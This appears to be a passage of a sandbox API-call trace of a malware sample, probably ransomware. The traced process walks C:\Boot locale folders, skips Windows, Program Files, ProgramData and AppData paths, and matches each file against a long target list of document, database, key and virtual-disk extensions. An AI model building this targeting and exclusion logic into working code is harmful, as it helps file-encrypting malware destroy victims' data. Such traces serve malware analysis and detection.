0x0 [0019.603] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\pl-PL", pszFile="*" | out: pszDest="C:\\Boot\\pl-PL\\*") returned="C:\\Boot\\pl-PL\\*" [0019.603] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.603] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.603] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.603] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.603] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.603] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.603] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\pl-PL", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned="C:\\Boot\\pl-PL\\bootmgr.exe.mui" [0019.603] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.603] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.603] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.604] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.604] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.604] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.604] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="pt-BR" | out: pszDest="C:\\Boot\\pt-BR") returned="C:\\Boot\\pt-BR" [0019.604] StrStrIW (lpFirst="C:\\Boot\\pt-BR", lpSrch="\\Windows") returned 0x0 [0019.604] StrStrIW (lpFirst="C:\\Boot\\pt-BR", lpSrch="\\Program Files") returned 0x0 [0019.604] StrStrIW (lpFirst="C:\\Boot\\pt-BR", lpSrch="\\ProgramData") returned 0x0 [0019.604] StrStrIW (lpFirst="C:\\Boot\\pt-BR", lpSrch="\\AppData") returned 0x0 [0019.604] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\pt-BR", pszFile="*" | out: pszDest="C:\\Boot\\pt-BR\\*") returned="C:\\Boot\\pt-BR\\*" [0019.604] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.606] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.606] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.606] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.606] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.606] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.606] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\pt-BR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned="C:\\Boot\\pt-BR\\bootmgr.exe.mui" [0019.606] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.606] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.606] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.606] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.606] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.606] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.606] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="pt-PT" | out: pszDest="C:\\Boot\\pt-PT") returned="C:\\Boot\\pt-PT" [0019.606] StrStrIW (lpFirst="C:\\Boot\\pt-PT", lpSrch="\\Windows") returned 0x0 [0019.606] StrStrIW (lpFirst="C:\\Boot\\pt-PT", lpSrch="\\Program Files") returned 0x0 [0019.606] StrStrIW (lpFirst="C:\\Boot\\pt-PT", lpSrch="\\ProgramData") returned 0x0 [0019.606] StrStrIW (lpFirst="C:\\Boot\\pt-PT", lpSrch="\\AppData") returned 0x0 [0019.606] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\pt-PT", pszFile="*" | out: pszDest="C:\\Boot\\pt-PT\\*") returned="C:\\Boot\\pt-PT\\*" [0019.606] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.607] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.607] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.607] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.607] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.607] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.607] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\pt-PT", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned="C:\\Boot\\pt-PT\\bootmgr.exe.mui" [0019.607] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.607] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.607] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.607] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.608] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.608] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.608] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="ru-RU" | out: pszDest="C:\\Boot\\ru-RU") returned="C:\\Boot\\ru-RU" [0019.608] StrStrIW (lpFirst="C:\\Boot\\ru-RU", lpSrch="\\Windows") returned 0x0 [0019.608] StrStrIW (lpFirst="C:\\Boot\\ru-RU", lpSrch="\\Program Files") returned 0x0 [0019.608] StrStrIW (lpFirst="C:\\Boot\\ru-RU", lpSrch="\\ProgramData") returned 0x0 [0019.608] StrStrIW (lpFirst="C:\\Boot\\ru-RU", lpSrch="\\AppData") returned 0x0 [0019.608] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\ru-RU", pszFile="*" | out: pszDest="C:\\Boot\\ru-RU\\*") returned="C:\\Boot\\ru-RU\\*" [0019.608] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.610] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.610] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.610] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.610] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.610] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.610] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\ru-RU", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned="C:\\Boot\\ru-RU\\bootmgr.exe.mui" [0019.610] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.610] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.611] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.611] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.611] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.611] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.611] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="sv-SE" | out: pszDest="C:\\Boot\\sv-SE") returned="C:\\Boot\\sv-SE" [0019.611] StrStrIW (lpFirst="C:\\Boot\\sv-SE", lpSrch="\\Windows") returned 0x0 [0019.611] StrStrIW (lpFirst="C:\\Boot\\sv-SE", lpSrch="\\Program Files") returned 0x0 [0019.611] StrStrIW (lpFirst="C:\\Boot\\sv-SE", lpSrch="\\ProgramData") returned 0x0 [0019.611] StrStrIW (lpFirst="C:\\Boot\\sv-SE", lpSrch="\\AppData") returned 0x0 [0019.611] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\sv-SE", pszFile="*" | out: pszDest="C:\\Boot\\sv-SE\\*") returned="C:\\Boot\\sv-SE\\*" [0019.611] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.611] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.611] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.611] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.611] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.611] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.612] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\sv-SE", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned="C:\\Boot\\sv-SE\\bootmgr.exe.mui" [0019.612] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.612] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.612] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.612] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.612] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.612] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.612] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="tr-TR" | out: pszDest="C:\\Boot\\tr-TR") returned="C:\\Boot\\tr-TR" [0019.612] StrStrIW (lpFirst="C:\\Boot\\tr-TR", lpSrch="\\Windows") returned 0x0 [0019.612] StrStrIW (lpFirst="C:\\Boot\\tr-TR", lpSrch="\\Program Files") returned 0x0 [0019.612] StrStrIW (lpFirst="C:\\Boot\\tr-TR", lpSrch="\\ProgramData") returned 0x0 [0019.612] StrStrIW (lpFirst="C:\\Boot\\tr-TR", lpSrch="\\AppData") returned 0x0 [0019.612] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\tr-TR", pszFile="*" | out: pszDest="C:\\Boot\\tr-TR\\*") returned="C:\\Boot\\tr-TR\\*" [0019.612] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.636] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.636] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.636] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.636] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.636] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.636] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\tr-TR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned="C:\\Boot\\tr-TR\\bootmgr.exe.mui" [0019.636] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.636] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.636] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.636] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.636] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.636] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.636] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="zh-CN" | out: pszDest="C:\\Boot\\zh-CN") returned="C:\\Boot\\zh-CN" [0019.636] StrStrIW (lpFirst="C:\\Boot\\zh-CN", lpSrch="\\Windows") returned 0x0 [0019.636] StrStrIW (lpFirst="C:\\Boot\\zh-CN", lpSrch="\\Program Files") returned 0x0 [0019.637] StrStrIW (lpFirst="C:\\Boot\\zh-CN", lpSrch="\\ProgramData") returned 0x0 [0019.637] StrStrIW (lpFirst="C:\\Boot\\zh-CN", lpSrch="\\AppData") returned 0x0 [0019.637] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\zh-CN", pszFile="*" | out: pszDest="C:\\Boot\\zh-CN\\*") returned="C:\\Boot\\zh-CN\\*" [0019.637] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.637] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.637] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.637] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.637] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.637] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.637] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\zh-CN", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned="C:\\Boot\\zh-CN\\bootmgr.exe.mui" [0019.637] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.637] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.637] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.637] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.637] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.637] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.637] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="zh-HK" | out: pszDest="C:\\Boot\\zh-HK") returned="C:\\Boot\\zh-HK" [0019.637] StrStrIW (lpFirst="C:\\Boot\\zh-HK", lpSrch="\\Windows") returned 0x0 [0019.637] StrStrIW (lpFirst="C:\\Boot\\zh-HK", lpSrch="\\Program Files") returned 0x0 [0019.637] StrStrIW (lpFirst="C:\\Boot\\zh-HK", lpSrch="\\ProgramData") returned 0x0 [0019.637] StrStrIW (lpFirst="C:\\Boot\\zh-HK", lpSrch="\\AppData") returned 0x0 [0019.637] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\zh-HK", pszFile="*" | out: pszDest="C:\\Boot\\zh-HK\\*") returned="C:\\Boot\\zh-HK\\*" [0019.638] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.639] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.639] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.639] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.639] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.639] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.639] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\zh-HK", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned="C:\\Boot\\zh-HK\\bootmgr.exe.mui" [0019.639] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.639] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.639] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.639] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.639] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.639] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.639] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="zh-TW" | out: pszDest="C:\\Boot\\zh-TW") returned="C:\\Boot\\zh-TW" [0019.639] StrStrIW (lpFirst="C:\\Boot\\zh-TW", lpSrch="\\Windows") returned 0x0 [0019.639] StrStrIW (lpFirst="C:\\Boot\\zh-TW", lpSrch="\\Program Files") returned 0x0 [0019.639] StrStrIW (lpFirst="C:\\Boot\\zh-TW", lpSrch="\\ProgramData") returned 0x0 [0019.639] StrStrIW (lpFirst="C:\\Boot\\zh-TW", lpSrch="\\AppData") returned 0x0 [0019.639] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\zh-TW", pszFile="*" | out: pszDest="C:\\Boot\\zh-TW\\*") returned="C:\\Boot\\zh-TW\\*" [0019.639] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.640] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.640] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.640] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.640] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.640] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.640] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\zh-TW", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned="C:\\Boot\\zh-TW\\bootmgr.exe.mui" [0019.640] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.640] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.640] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.640] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.641] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 0 [0019.641] FindClose (in: hFindFile=0x3682f0 | out: hFindFile=0x3682f0) returned 1 [0019.641] FindNextFileW (in: hFindFile=0x3682b0, lpFindFileData=0x31cf420 | out: lpFindFileData=0x31cf420) returned 1 [0019.641] 